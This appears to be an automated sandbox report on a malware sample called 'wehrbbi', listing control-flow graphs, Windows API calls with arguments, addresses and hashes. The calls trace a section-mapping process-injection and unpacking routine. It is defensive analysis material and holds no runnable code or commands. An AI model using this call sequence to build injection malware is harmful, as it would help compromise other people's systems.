                                                              • Source File: 00000005.00000002.2010296726.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_wehrbbi.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                              • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                              • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                              • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 197 4014fe-401503 198 401531-40156e call 401193 197->198 199 401506-401511 197->199 209 401570 198->209 210 401573-401578 198->210 209->210 212 401898-4018a0 210->212 213 40157e-40158f 210->213 212->210 218 4018a5-4018b7 212->218 216 401595-4015be 213->216 217 401896 213->217 216->217 227 4015c4-4015db NtDuplicateObject 216->227 217->218 224 4018c5 218->224 225 4018bc-4018e3 call 401193 218->225 224->225 227->217 229 4015e1-401605 NtCreateSection 227->229 231 401661-401687 NtCreateSection 229->231 232 401607-401628 NtMapViewOfSection 229->232 231->217 233 40168d-401691 231->233 232->231 235 40162a-401646 NtMapViewOfSection 232->235 233->217 236 401697-4016b8 NtMapViewOfSection 233->236 235->231 238 401648-40165e 235->238 236->217 239 4016be-4016da NtMapViewOfSection 236->239 238->231 239->217 241 4016e0 call 4016e5 239->241
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2010296726.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_wehrbbi.jbxd
                                                              Similarity
                                                              • API ID: Section$CreateDuplicateObjectView
                                                              • String ID:
                                                              • API String ID: 1652636561-0
                                                              • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                              • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                              • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                              • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 244 401542-40156e call 401193 253 401570 244->253 254 401573-401578 244->254 253->254 256 401898-4018a0 254->256 257 40157e-40158f 254->257 256->254 262 4018a5-4018b7 256->262 260 401595-4015be 257->260 261 401896 257->261 260->261 271 4015c4-4015db NtDuplicateObject 260->271 261->262 268 4018c5 262->268 269 4018bc-4018e3 call 401193 262->269 268->269 271->261 273 4015e1-401605 NtCreateSection 271->273 275 401661-401687 NtCreateSection 273->275 276 401607-401628 NtMapViewOfSection 273->276 275->261 277 40168d-401691 275->277 276->275 279 40162a-401646 NtMapViewOfSection 276->279 277->261 280 401697-4016b8 NtMapViewOfSection 277->280 279->275 282 401648-40165e 279->282 280->261 283 4016be-4016da NtMapViewOfSection 280->283 282->275 283->261 285 4016e0 call 4016e5 283->285
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2010296726.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_wehrbbi.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                              • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                              • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                              • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 288 401549-40156e call 401193 292 401570 288->292 293 401573-401578 288->293 292->293 295 401898-4018a0 293->295 296 40157e-40158f 293->296 295->293 301 4018a5-4018b7 295->301 299 401595-4015be 296->299 300 401896 296->300 299->300 310 4015c4-4015db NtDuplicateObject 299->310 300->301 307 4018c5 301->307 308 4018bc-4018e3 call 401193 301->308 307->308 310->300 312 4015e1-401605 NtCreateSection 310->312 314 401661-401687 NtCreateSection 312->314 315 401607-401628 NtMapViewOfSection 312->315 314->300 316 40168d-401691 314->316 315->314 318 40162a-401646 NtMapViewOfSection 315->318 316->300 319 401697-4016b8 NtMapViewOfSection 316->319 318->314 321 401648-40165e 318->321 319->300 322 4016be-4016da NtMapViewOfSection 319->322 321->314 322->300 324 4016e0 call 4016e5 322->324
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2010296726.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_wehrbbi.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                              • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                              • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                              • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 327 401557 328 40155b-40156e call 401193 327->328 329 40154f-401554 327->329 332 401570 328->332 333 401573-401578 328->333 329->328 332->333 335 401898-4018a0 333->335 336 40157e-40158f 333->336 335->333 341 4018a5-4018b7 335->341 339 401595-4015be 336->339 340 401896 336->340 339->340 350 4015c4-4015db NtDuplicateObject 339->350 340->341 347 4018c5 341->347 348 4018bc-4018e3 call 401193 341->348 347->348 350->340 352 4015e1-401605 NtCreateSection 350->352 354 401661-401687 NtCreateSection 352->354 355 401607-401628 NtMapViewOfSection 352->355 354->340 356 40168d-401691 354->356 355->354 358 40162a-401646 NtMapViewOfSection 355->358 356->340 359 401697-4016b8 NtMapViewOfSection 356->359 358->354 361 401648-40165e 358->361 359->340 362 4016be-4016da NtMapViewOfSection 359->362 361->354 362->340 364 4016e0 call 4016e5 362->364
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2010296726.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_wehrbbi.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                              • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                              • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                              • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 368 402f97-402fbb 369 402fc1-402fd9 368->369 370 4030ee-4030f3 368->370 369->370 371 402fdf-402ff0 369->371 372 402ff2-402ffb 371->372 373 403000-40300e 372->373 373->373 374 403010-403017 373->374 375 403039-403040 374->375 376 403019-403038 374->376 377 403062-403065 375->377 378 403042-403061 375->378 376->375 379 403067-40306a 377->379 380 40306e 377->380 378->377 379->380 381 40306c 379->381 380->372 382 403070-403075 380->382 381->382 382->370 383 403077-40307a 382->383 383->370 384 40307c-4030eb RtlCreateUserThread NtTerminateProcess 383->384 384->370
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2010296726.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_wehrbbi.jbxd
                                                              Similarity
                                                              • API ID: CreateProcessTerminateThreadUser
                                                              • String ID:
                                                              • API String ID: 1921587553-0
                                                              • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                              • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                              • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                              • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 65 2c7003c-2c70047 66 2c7004c-2c70263 call 2c70a3f call 2c70e0f call 2c70d90 VirtualAlloc 65->66 67 2c70049 65->67 82 2c70265-2c70289 call 2c70a69 66->82 83 2c7028b-2c70292 66->83 67->66 88 2c702ce-2c703c2 VirtualProtect call 2c70cce call 2c70ce7 82->88 85 2c702a1-2c702b0 83->85 87 2c702b2-2c702cc 85->87 85->88 87->85 94 2c703d1-2c703e0 88->94 95 2c703e2-2c70437 call 2c70ce7 94->95 96 2c70439-2c704b8 VirtualFree 94->96 95->94 98 2c705f4-2c705fe 96->98 99 2c704be-2c704cd 96->99 100 2c70604-2c7060d 98->100 101 2c7077f-2c70789 98->101 103 2c704d3-2c704dd 99->103 100->101 104 2c70613-2c70637 100->104 107 2c707a6-2c707b0 101->107 108 2c7078b-2c707a3 101->108 103->98 106 2c704e3-2c70505 103->106 111 2c7063e-2c70648 104->111 115 2c70517-2c70520 106->115 116 2c70507-2c70515 106->116 109 2c707b6-2c707cb 107->109 110 2c7086e-2c708be LoadLibraryA 107->110 108->107 112 2c707d2-2c707d5 109->112 120 2c708c7-2c708f9 110->120 111->101 113 2c7064e-2c7065a 111->113 117 2c707d7-2c707e0 112->117 118 2c70824-2c70833 112->118 113->101 119 2c70660-2c7066a 113->119 121 2c70526-2c70547 115->121 116->121 122 2c707e4-2c70822 117->122 123 2c707e2 117->123 125 2c70839-2c7083c 118->125 124 2c7067a-2c70689 119->124 126 2c70902-2c7091d 120->126 127 2c708fb-2c70901 120->127 128 2c7054d-2c70550 121->128 122->112 123->118 129 2c70750-2c7077a 124->129 130 2c7068f-2c706b2 124->130 125->110 131 2c7083e-2c70847 125->131 127->126 133 2c70556-2c7056b 128->133 134 2c705e0-2c705ef 128->134 129->111 135 2c706b4-2c706ed 130->135 136 2c706ef-2c706fc 130->136 137 2c7084b-2c7086c 131->137 138 2c70849 131->138 139 2c7056f-2c7057a 133->139 140 2c7056d 133->140 134->103 135->136 141 2c706fe-2c70748 136->141 142 2c7074b 136->142 137->125 138->110 143 2c7057c-2c70599 139->143 144 2c7059b-2c705bb 139->144 140->134 141->142 142->124 149 2c705bd-2c705db 143->149 144->149 149->128
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02C7024D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2011202402.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2c70000_wehrbbi.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID: cess$kernel32.dll
                                                              • API String ID: 4275171209-1230238691
                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction ID: 2578528d95e296f0f130f97727f7e8a4b4dd266050c786927ed7d4256d07e6d4
                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction Fuzzy Hash: 97526975A01229DFDB64CF68C985BACBBB1BF09304F1480D9E94DAB351DB30AA85DF14

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 367 4157a0-4158e0 GetModuleHandleW GetProcAddress VirtualProtect
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(02B17CE0), ref: 0041587F
                                                              • GetProcAddress.KERNEL32(00000000,00419CC8), ref: 004158BC
                                                              • VirtualProtect.KERNELBASE(02B17B24,02B17CDC,00000040,?), ref: 004158DB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2010315758.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_40b000_wehrbbi.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                              • String ID:
                                                              • API String ID: 2099061454-3916222277
                                                              • Opcode ID: 116f1aac112c905ec162d7070cd71efd76129b0df4f3260cda570b903644e0cb
                                                              • Instruction ID: e4fb223d50131012075ae1e13ab3c59e5b4ef3b604d21eb0d0e12d9e3e0b2718
                                                              • Opcode Fuzzy Hash: 116f1aac112c905ec162d7070cd71efd76129b0df4f3260cda570b903644e0cb
                                                              • Instruction Fuzzy Hash: C0312310958380CAF301CB78F8147927FE2BB25744F449479D188873A5EFBA5924D7EE

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 385 2d2a68f-2d2a6a8 386 2d2a6aa-2d2a6ac 385->386 387 2d2a6b3-2d2a6bf CreateToolhelp32Snapshot 386->387 388 2d2a6ae 386->388 389 2d2a6c1-2d2a6c7 387->389 390 2d2a6cf-2d2a6dc Module32First 387->390 388->387 389->390 395 2d2a6c9-2d2a6cd 389->395 391 2d2a6e5-2d2a6ed 390->391 392 2d2a6de-2d2a6df call 2d2a34e 390->392 396 2d2a6e4 392->396 395->386 395->390 396->391
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02D2A6B7
                                                              • Module32First.KERNEL32(00000000,00000224), ref: 02D2A6D7
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2011394897.0000000002D27000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D27000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2d27000_wehrbbi.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 3833638111-0
                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                              • Instruction ID: b1710d64503777c5cb7bb022b527b00d4d1a423ded57817b5f3bc708318da196
                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                              • Instruction Fuzzy Hash: 34F09632200B216FD7203BF5AD8CB6F76E9EF5962DF100569E652926C0DB70EC498A61

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 398 2c70e0f-2c70e24 SetErrorMode * 2 399 2c70e26 398->399 400 2c70e2b-2c70e2c 398->400 399->400
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00000400,?,?,02C70223,?,?), ref: 02C70E19
                                                              • SetErrorMode.KERNELBASE(00000000,?,?,02C70223,?,?), ref: 02C70E1E
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2011202402.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2c70000_wehrbbi.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction ID: 25ef51fef4db5f7ec44bd9215f2815ef669215441d4b8e203029a7bdcddcdc72
                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction Fuzzy Hash: 05D01232245228B7DB002A94DC09BCEBB1CDF09BA6F008021FB0DE9080CBB09A4047EA

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 401 4018e6-40194b call 401193 Sleep call 40141f 415 40195a-4019a5 call 401193 401->415 416 40194d-401955 call 401514 401->416 416->415
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2010296726.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_wehrbbi.jbxd
                                                              Similarity
                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                              • String ID:
                                                              • API String ID: 1885482327-0
                                                              • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                              • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                              • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                              • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 430 401915-401918 431 4018c6-4018c7 430->431 432 40191a-40194b call 401193 Sleep call 40141f 430->432 433 4018d7 431->433 434 4018ce-4018e3 call 401193 431->434 444 40195a-4019a5 call 401193 432->444 445 40194d-401955 call 401514 432->445 433->434 445->444
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2010296726.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_wehrbbi.jbxd
                                                              Similarity
                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                              • String ID:
                                                              • API String ID: 1885482327-0
                                                              • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                              • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                              • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                              • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 459 4018f1-40194b call 401193 Sleep call 40141f 469 40195a-4019a5 call 401193 459->469 470 40194d-401955 call 401514 459->470 470->469
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2010296726.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_wehrbbi.jbxd
                                                              Similarity
                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                              • String ID:
                                                              • API String ID: 1885482327-0
                                                              • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                              • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                              • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                              • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 484 401912-40194b call 401193 Sleep call 40141f 495 40195a-4019a5 call 401193 484->495 496 40194d-401955 call 401514 484->496 496->495
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2010296726.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_wehrbbi.jbxd
                                                              Similarity
                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                              • String ID:
                                                              • API String ID: 1885482327-0
                                                              • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                              • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                              • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                              • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02D2A39F
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2011394897.0000000002D27000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D27000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2d27000_wehrbbi.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction ID: c8a229fe3a6202df0dddb45838507c162081b1c6d11cce800134d345b8960f75
                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction Fuzzy Hash: 8C113C79A00208EFDB01DF98CA85E98BBF5EF08751F058094F9489B361D371EA54EF90
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2010296726.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_wehrbbi.jbxd
                                                              Similarity
                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                              • String ID:
                                                              • API String ID: 1885482327-0
                                                              • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                              • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                              • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                              • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                                              APIs
                                                              • LocalAlloc.KERNELBASE(00000000,02B17CDC,00415DED), ref: 00415778
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2010315758.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_40b000_wehrbbi.jbxd
                                                              Similarity
                                                              • API ID: AllocLocal
                                                              • String ID:
                                                              • API String ID: 3494564517-0
                                                              • Opcode ID: 491b2396958e246e7e1f57a1d5fd83289a83e0f0b88f12e6db4e963f9079e42a
                                                              • Instruction ID: c7cd43120ea3207c5deb018b1e7389296927365904e67ce4adcfa047d92e18f4
                                                              • Opcode Fuzzy Hash: 491b2396958e246e7e1f57a1d5fd83289a83e0f0b88f12e6db4e963f9079e42a
                                                              • Instruction Fuzzy Hash: 5BC02B70847282CFDB0A8B3094080E67EE0E6DF2427A40CEDC5C3C70A1DF16054EDB04
